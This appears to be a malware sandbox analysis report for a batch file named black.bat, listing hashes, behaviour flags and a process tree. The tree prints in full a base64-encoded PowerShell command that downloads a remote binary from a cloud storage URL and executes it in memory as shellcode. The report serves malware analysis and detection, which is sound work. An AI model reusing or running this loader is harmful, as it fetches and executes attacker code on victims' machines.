Overview

overview

10

Static

static

10

Downloads/...07.exe

windows10-2004-x64

10

Downloads/...5e.exe

windows10-2004-x64

10

Downloads/...92.exe

windows10-2004-x64

10

Downloads/...25.exe

windows10-2004-x64

10

Downloads/...2e.exe

windows10-2004-x64

10

Downloads/...8e.exe

windows10-2004-x64

10

Downloads/...d4.exe

windows10-2004-x64

10

Downloads/...98.exe

windows10-2004-x64

10

Downloads/...b7.exe

windows10-2004-x64

10

Downloads/Built.exe

windows10-2004-x64

8

Downloads/...53.bat

windows10-2004-x64

10

Downloads/DTLite.exe

windows10-2004-x64

10

Downloads/...07.exe

windows10-2004-x64

10

Downloads/PDF.exe

windows10-2004-x64

10

Downloads/...SX.exe

windows10-2004-x64

10

Downloads/...8a.exe

windows10-2004-x64

10

Downloads/arwbjuh.exe

windows10-2004-x64

10

Downloads/bjutbht.exe

windows10-2004-x64

10

Downloads/black.bat

windows10-2004-x64

8

Downloads/...mm.dll

windows10-2004-x64

10

Downloads/...er.exe

windows10-2004-x64

1

Downloads/...6d.exe

windows10-2004-x64

10

Downloads/dwvhgtd.exe

windows10-2004-x64

10

Downloads/file.exe

windows10-2004-x64

10

Downloads/helper.bat

windows10-2004-x64

10

Downloads/setup.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-07-2024 08:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Downloads/black.bat

  • Size

    7KB

  • MD5

    1527117f206e85215dc0b306ff303997

  • SHA1

    058297bbc06690c0fc1614a27dccab912acbfd01

  • SHA256

    8ea56b9b4f79485aedb615161ba64c55950a6970f21dc0f2a7691dd66de91cd2

  • SHA512

    490de266e4516bee0cc6075ec693cbe53c629a1f9740df94951b780745ea67b452b96b6d4e413d9a144e2f853da4cbd0bfab86638440daf8cc7ac9a1269c4e4f

  • SSDEEP

    192:9y/GNQigY2Nw9GKNCufevytXrrLe57YKRZ280QDdc28eNMqMzDWZ:9EGNrJzsKUufKytXr2OKH0Mi28eNMqM2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Downloads\black.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwAKAGYAdQBuAGMAdABpAG8AbgAgAEwAbwBvAGsAdQBwAEYAdQBuAGMAIAB7AAoAIAAgACAAIABQAGEAcgBhAG0AIAAoACQAbQBvAGQAdQBsAGUATgBhAG0AZQAsACAAJABmAHUAbgBjAHQAaQBvAG4ATgBhAG0AZQApAAoAIAAgACAAIAAkAGEAcwBzAGUAbQAgAD0AIAAoAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEcAZQB0AEEAcwBzAGUAbQBiAGwAaQBlAHMAKAApACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEcAbABvAGIAYQBsAEEAcwBzAGUAbQBiAGwAeQBDAGEAYwBoAGUAIAAtAEEAbgBkACAAJABfAC4ATABvAGMAYQB0AGkAbwBuAC4AUwBwAGwAaQB0ACgAJwBcAFwAJwApAFsALQAxAF0ALgBFAHEAdQBhAGwAcwAoACcAUwB5AHMAdABlAG0ALgBkAGwAbAAnACkAfQApAC4ARwBlAHQAVAB5AHAAZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIALgBVAG4AcwBhAGYAZQBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzACcAKQAKACAAIAAgACAAJAB0AG0AcAAgAD0AIAAkAGEAcwBzAGUAbQAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsASQBmACgAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAIgApACAAewAkAF8AfQB9ACAACgAgACAAIAAgACQAaABhAG4AZABsAGUAIAA9ACAAJABhAHMAcwBlAG0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAkAG0AbwBkAHUAbABlAE4AYQBtAGUAKQApADsACgAgACAAIAAgAFsASQBuAHQAUAB0AHIAXQAgACQAcgBlAHMAdQBsAHQAIAA9ACAAMAA7AAoAIAAgACAAIAB0AHIAeQAgAHsACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARgBpAHIAcwB0ACAASQBuAHYAbwBrAGUAIAAtACAAJABtAG8AZAB1AGwAZQBOAGEAbQBlACAAJABmAHUAbgBjAHQAaQBvAG4ATgBhAG0AZQAiADsACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAHQAbQBwAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAkAGgAYQBuAGQAbABlACwAIAAkAGYAdQBuAGMAdABpAG8AbgBOAGEAbQBlACkAKQA7AAoAIAAgACAAIAB9AGMAYQB0AGMAaAAgAHsACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAUwBlAGMAbwBuAGQAIABJAG4AdgBvAGsAZQAgAC0AIAAkAG0AbwBkAHUAbABlAE4AYQBtAGUAIAAkAGYAdQBuAGMAdABpAG8AbgBOAGEAbQBlACIAOwAKACAAIAAgACAAIAAgACAAIAAkAGgAYQBuAGQAbABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ASABhAG4AZABsAGUAUgBlAGYAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACQAbgB1AGwAbAAsACAAJABoAGEAbgBkAGwAZQApADsACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAHQAbQBwAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAkAGgAYQBuAGQAbABlACwAIAAkAGYAdQBuAGMAdABpAG8AbgBOAGEAbQBlACkAKQA7AAoAIAAgACAAIAB9AAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAcgBlAHMAdQBsAHQAOwAKAH0ACgBmAHUAbgBjAHQAaQBvAG4AIABnAGUAdABEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAgAHsACgAgACAAIAAgAFAAYQByAGEAbQAgACgAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAwACwAIABNAGEAbgBkAGEAdABvAHIAeQAgAD0AIAAkAFQAcgB1AGUAKQBdACAAWwBUAHkAcABlAFsAXQBdACAAJABmAHUAbgBjACwAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAxACkAXQAgAFsAVAB5AHAAZQBdACAAJABkAGUAbABUAHkAcABlACAAPQAgAFsAVgBvAGkAZABdACkACgAgACAAIAAgACQAdAB5AHAAZQAgAD0AIABbAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACgAJwBSAGUAZgBsAGUAYwB0AGUAZABEAGUAbABlAGcAYQB0AGUAJwApACkALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4ARQBtAGkAdAAuAEEAcwBzAGUAbQBiAGwAeQBCAHUAaQBsAGQAZQByAEEAYwBjAGUAcwBzAF0AOgA6AFIAdQBuACkALgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACgAJwBJAG4ATQBlAG0AbwByAHkATQBvAGQAdQBsAGUAJwAsACAAJABmAGEAbABzAGUAKQAuAEQAZQBmAGkAbgBlAFQAeQBwAGUAKAAnAE0AeQBEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAnACwAJwBDAGwAYQBzAHMALAAgAFAAdQBiAGwAaQBjACwAIABTAGUAYQBsAGUAZAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEEAdQB0AG8AQwBsAGEAcwBzACcALAAgAFsAUwB5AHMAdABlAG0ALgBNAHUAbAB0AGkAYwBhAHMAdABEAGUAbABlAGcAYQB0AGUAXQApAAoAIAAgACAAIAAkAHQAeQBwAGUALgBEAGUAZgBpAG4AZQBDAG8AbgBzAHQAcgB1AGMAdABvAHIAKAAnAFIAVABTAHAAZQBjAGkAYQBsAE4AYQBtAGUALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABQAHUAYgBsAGkAYwAnACwAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBDAGEAbABsAGkAbgBnAEMAbwBuAHYAZQBuAHQAaQBvAG4AcwBdADoAOgBTAHQAYQBuAGQAYQByAGQALAAgACQAZgB1AG4AYwApAC4AUwBlAHQASQBtAHAAbABlAG0AZQBuAHQAYQB0AGkAbwBuAEYAbABhAGcAcwAoACcAUgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAAnACkACgAgACAAIAAgACQAdAB5AHAAZQAuAEQAZQBmAGkAbgBlAE0AZQB0AGgAbwBkACgAJwBJAG4AdgBvAGsAZQAnACwAIAAnAFAAdQBiAGwAaQBjACwAIABIAGkAZABlAEIAeQBTAGkAZwAsACAATgBlAHcAUwBsAG8AdAAsACAAVgBpAHIAdAB1AGEAbAAnACwAIAAkAGQAZQBsAFQAeQBwAGUALAAgACQAZgB1AG4AYwApAC4AUwBlAHQASQBtAHAAbABlAG0AZQBuAHQAYQB0AGkAbwBuAEYAbABhAGcAcwAoACcAUgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAAnACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAB0AHkAcABlAC4AQwByAGUAYQB0AGUAVAB5AHAAZQAoACkAIAAKAH0ACgAKAFsAQgB5AHQAZQBbAF0AXQAgACQAYgB1AGYAIAA9ACAAKABpAFcAcgAgAC0AVQBzAEUAYgAgACIAaAB0AHQAcABzADoALwAvAHUAcABuAG8AdwAtAHAAcgBvAGQALgBmAGYANAA1AGUANAAwAGQAMQBhADEAYwA4AGYANwBlADcAZABlADQAZQA5ADcANgBkADAAYwA5AGUANQA1ADUALgByADIALgBjAGwAbwB1AGQAZgBsAGEAcgBlAHMAdABvAHIAYQBnAGUALgBjAG8AbQAvAEIASgBrAHYAYgBGAG8AagBXAFAAVQBRAGEAdQBEAEsANgAxAEIAcwAxAEgANwBtAFAAdgBHADMALwBhADkAYwBiAGYAZQA5ADEALQA1AGUANwBmAC0ANAA3AGEAOQAtAGEAMAA1AGMALQA5AGUAYQBhAGMANQBiAGIAMgBlADMAYwA/AFgALQBBAG0AegAtAEEAbABnAG8AcgBpAHQAaABtAD0AQQBXAFMANAAtAEgATQBBAEMALQBTAEgAQQAyADUANgAmAFgALQBBAG0AegAtAEMAcgBlAGQAZQBuAHQAaQBhAGwAPQBjAGQAZAAxADIAZQAzADUAYgBiAGQAMgAyADAAMwAwADMAOQA1ADcAZABjADUANgAwADMAYQA0AGMAYwA4AGUAJQAyAEYAMgAwADIANAAwADcAMQA0ACUAMgBGAGEAdQB0AG8AJQAyAEYAcwAzACUAMgBGAGEAdwBzADQAXwByAGUAcQB1AGUAcwB0ACYAWAAtAEEAbQB6AC0ARABhAHQAZQA9ADIAMAAyADQAMAA3ADEANABUADAANgAzADMANQA2AFoAJgBYAC0AQQBtAHoALQBFAHgAcABpAHIAZQBzAD0ANAAzADIAMAAwACYAWAAtAEEAbQB6AC0AUwBpAGcAbgBhAHQAdQByAGUAPQAyADUANAAwADEAMwBjADQAZQAxAGIAZgA0ADcAZQAxAGMAZAA4ADAANAAzADMAYwA4AGUAZAAyADUANABhADYANAA0ADgANgA2ADEAYwAwAGIAZQAxAGMAOQBkADUAMgBjADMANAAzAGIAYgBlADgAOAA4AGYAOAA3AGMAYgA2ACYAWAAtAEEAbQB6AC0AUwBpAGcAbgBlAGQASABlAGEAZABlAHIAcwA9AGgAbwBzAHQAJgByAGUAcwBwAG8AbgBzAGUALQBjAG8AbgB0AGUAbgB0AC0AZABpAHMAcABvAHMAaQB0AGkAbwBuAD0AYQB0AHQAYQBjAGgAbQBlAG4AdAAlADMAQgAlADIAMABmAGkAbABlAG4AYQBtAGUAJQAzAEQAJQAyADIAbwB1AHQALgBiAGkAbgAlADIAMgAiACkALgBjAG8AbgB0AGUAbgB0AAoAJABsAHAATQBlAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoARwBlAHQARABlAGwAZQBnAGEAdABlAEYAbwByAEYAdQBuAGMAdABpAG8AbgBQAG8AaQBuAHQAZQByACgAKABMAG8AbwBrAHUAcABGAHUAbgBjACAAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwApACwAKABnAGUAdABEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAgAEAAKABbAEkAbgB0AFAAdAByAF0ALAAgAFsAVQBJAG4AdAAzADIAXQAsACAAWwBVAEkAbgB0ADMAMgBdACwAIABbAFUASQBuAHQAMwAyAF0AKQAoAFsASQBuAHQAUAB0AHIAXQApACkAKQAuAEkAbgB2AG8AawBlACgAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIAAkAGIAdQBmAC4AbABlAG4AZwB0AGgALAAgADAAeAAzADAAMAAwACwAIAAwAHgANAAwACkACgBbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBDAG8AcAB5ACgAJABiAHUAZgAsACAAMAAsACAAJABsAHAATQBlAG0ALAAgACQAYgB1AGYALgBsAGUAbgBnAHQAaAApAAoAJABoAFQAaAByAGUAYQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEcAZQB0AEQAZQBsAGUAZwBhAHQAZQBGAG8AcgBGAHUAbgBjAHQAaQBvAG4AUABvAGkAbgB0AGUAcgAoACgATABvAG8AawB1AHAARgB1AG4AYwAgAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKQAsACgAZwBlAHQARABlAGwAZQBnAGEAdABlAFQAeQBwAGUAIABAACgAWwBJAG4AdABQAHQAcgBdACwAIABbAFUASQBuAHQAMwAyAF0ALAAgAFsASQBuAHQAUAB0AHIAXQAsACAAWwBJAG4AdABQAHQAcgBdACwAWwBVAEkAbgB0ADMAMgBdACwAIABbAEkAbgB0AFAAdAByAF0AKQAoAFsASQBuAHQAUAB0AHIAXQApACkAKQAuAEkAbgB2AG8AawBlACgAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAMAAsACQAbABwAE0AZQBtACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAMAAsAFsASQBuAHQAUAB0AHIAXQA6ADoAWgBlAHIAbwApAAoAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoARwBlAHQARABlAGwAZQBnAGEAdABlAEYAbwByAEYAdQBuAGMAdABpAG8AbgBQAG8AaQBuAHQAZQByACgAKABMAG8AbwBrAHUAcABGAHUAbgBjACAAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACkALAAoAGcAZQB0AEQAZQBsAGUAZwBhAHQAZQBUAHkAcABlACAAQAAoAFsASQBuAHQAUAB0AHIAXQAsACAAWwBJAG4AdAAzADIAXQApACgAWwBJAG4AdABdACkAKQApAC4ASQBuAHYAbwBrAGUAKAAkAGgAVABoAHIAZQBhAGQALAAgADAAeABGAEYARgBGAEYARgBGAEYAKQA=
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4612

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3v12z4m.5w1.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/4612-0-0x00007FFBACFC3000-0x00007FFBACFC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4612-1-0x0000027FC75E0000-0x0000027FC7602000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4612-11-0x00007FFBACFC0000-0x00007FFBADA81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4612-12-0x00007FFBACFC0000-0x00007FFBADA81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4612-13-0x00007FFBACFC0000-0x00007FFBADA81000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4612-14-0x00007FFBACFC0000-0x00007FFBADA81000-memory.dmp

    Filesize

    10.8MB

    Download